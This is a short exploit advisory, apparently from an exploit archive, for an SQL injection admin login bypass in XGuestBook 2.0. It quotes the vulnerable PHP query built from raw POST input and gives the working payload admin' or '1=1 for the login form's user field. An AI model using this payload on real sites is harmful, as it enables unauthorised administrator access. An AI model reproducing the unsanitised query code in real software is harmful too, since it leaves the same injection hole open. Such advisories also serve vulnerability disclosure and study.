id: 4881
date: 02/24/2009
title: XGuestBook 2.0 (Auth Bypass) SQL Injection Vulnerability
author: Fireshot
cves: 

========================================================
XGuestBook 2.0 (Auth Bypass) SQL Injection Vulnerability
========================================================


##########################################################################

Author = FireShot , Jacopo Vuga.

Vulnerability = SQL Admin Auth Bypass
Software = XGuestBook v2.0

###########################################################################

[CODE]

$user = $_POST['user'];
$pass = md5($_POST['pass']);

$result = mysql_query("SELECT * FROM xgb_user WHERE user='" . $user . "'
AND pass= '" . $pass . "'", $db_conn) or die (mysql_error());

[/CODE]


[EXPLOIT]

[URL] = http://www.site.com/login.php

you can inject SQL code in the USER space to bypass the admin login 

[USER] = admin' or '1=1

[/EXPLOIT]

############################################################################



#  0day.today [2023-03-24]  #